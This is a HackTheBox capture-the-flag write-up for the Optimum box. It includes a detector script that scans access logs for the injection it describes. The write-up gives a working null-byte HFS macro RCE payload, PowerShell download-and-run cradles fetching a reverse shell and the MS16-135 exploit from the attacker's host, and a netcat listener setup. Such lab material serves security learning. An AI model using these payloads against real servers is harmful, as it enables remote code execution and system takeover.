HackTheBox — Optimum
Hey guys, what’s going on, this is shellbreak and we’ll be doing Optimum from HackTheBox, which is rated as easy.
The idea of the box is an HttpFileServer that has an RCE vulnerability, which we’ll use to get a shell on the box. Once we have a shell, for the privesc we’ll use a PowerShell script called Sherlock.ps1 to enumerate the box locally and get a root shell.
So, enough talking and let’s jump in.
As always we’ll start with nmap scanning:
nmap -sC -sV -oA nmap/optimum 10.10.10.8
As you can see we have one port open, 80, and its banner tells us that it’s HttpFileServer version 2.3.
After googling around, I found that this server has an RCE vulnerability; check this URL to read more about it:
Web Enumeration:
The vulnerability comes down to the search feature in the app failing to handle null bytes.
The input in the search feature is filtered with a regex, so by using a null byte we can terminate the regex string and then insert the command we want.
While googling for CVEs I saw that the server has a special scripting language (HFS scripting), which we’ll use to execute our commands on the box.
See this page if you’d like to get an idea of the scripting language:
We’ll be using the “exec” function to execute commands:
{.exec|command.}
Exploitation:
Using Burp to intercept the request (after submitting our input in the search box):
Now, since the box is 64-bit, I’ll use 64-bit PowerShell to upload my shell.
You can get the script that I’ll be using from this GitHub repo:
I’m going to use the Invoke-PowerShellTcp.ps1 script, but before that we have to edit the script so it invokes the right function with our IP address:
Copy this line and add it to the end of the script:
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.34 -Port 1234
Note: run a Python simple HTTP server so the box can download the script.
The payload should look like:
%00{.exec|c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX(New-Object Net.WebClient).downloadString('http://10.10.14.34:8000/Invoke-PowerShellTcp.ps1').}
Now on Burp:
Don’t forget to set up your netcat listener on port 1234.
And we got a user shell:
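As an added example (not part of the original write-up), here is a small detector for the request shape described above, a URL-encoded null byte in the search parameter followed by an HFS macro, run over ordinary access-log lines; the log lines, addresses and script name in it are constructed placeholders.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Matches the HFS macro opener "{.name|" used in the post ({.exec|command.}).
MACRO_RE = re.compile(r"\{\.\s*(\w+)\s*\|")
# Strings typical of a PowerShell download-and-run one-liner.
CRADLE_RE = re.compile(r"DownloadString|\bIEX\b|Invoke-Expression", re.IGNORECASE)
# Pulls the request target out of a Common Log Format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def inspect_target(target: str) -> list[str]:
    """Examine the query string of one request target and return the
    reasons it looks like the null-byte macro injection, if any."""
    reasons = []
    # parse_qs percent-decodes each value, so %00 becomes a real NUL character.
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for value in values:
            has_nul = "\x00" in value
            macro = MACRO_RE.search(value)
            if has_nul and macro:
                reasons.append(f"{name}: null byte followed by HFS macro '{macro.group(1)}'")
            elif macro:
                reasons.append(f"{name}: HFS macro '{macro.group(1)}' in user input")
            elif has_nul:
                reasons.append(f"{name}: embedded null byte")
            if CRADLE_RE.search(value):
                reasons.append(f"{name}: PowerShell download cradle")
    return reasons

def scan_log(lines) -> list[tuple[int, list[str]]]:
    """Return (line number, reasons) for every log line whose request is flagged."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match:
            reasons = inspect_target(match.group(1))
            if reasons:
                hits.append((lineno, reasons))
    return hits

# Constructed sample log lines (not real traffic): a normal search, the injection
# shape from the post as a proxy would URL-encode it, and a plain file download.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:12:00:00 +0000] "GET /?search=report HTTP/1.1" 200 512',
    '192.0.2.10 - - [01/Jan/2024:12:00:05 +0000] "GET /?search=%00%7B.exec%7Cpowershell.exe%20IEX(New-Object%20Net.WebClient).downloadString(%27http://192.0.2.99:8000/x.ps1%27).%7D HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:12:00:09 +0000] "GET /files/readme.txt HTTP/1.1" 200 77',
]
if __name__ == "__main__":
    for lineno, reasons in scan_log(SAMPLE_LOG):
        print(f"line {lineno}: " + "; ".join(reasons))
```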
Now let’s upload the Sherlock script to enumerate the box and see if we get anything.
You can get the script from this repo:
Note: you need to invoke the function you want to execute at the end of the Sherlock script (in my case it’s Find-AllVulns).
Now download the script on the box:
And we can see that the server is vulnerable to MS16-135, so let’s get the exploit and see if it’s going to work.
Download the exploit from this URL:
https://github.com/SecWiki/windows-kernel-exploits/blob/master/MS16-135/MS16-135.ps1
Now let’s download the script on the box:
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.34:8000/ms16-135.ps1')
And indeed we got root on the box.
So, this is how we own root on the Optimum box. I hope you guys enjoyed it and I’ll see you all in the next write-up.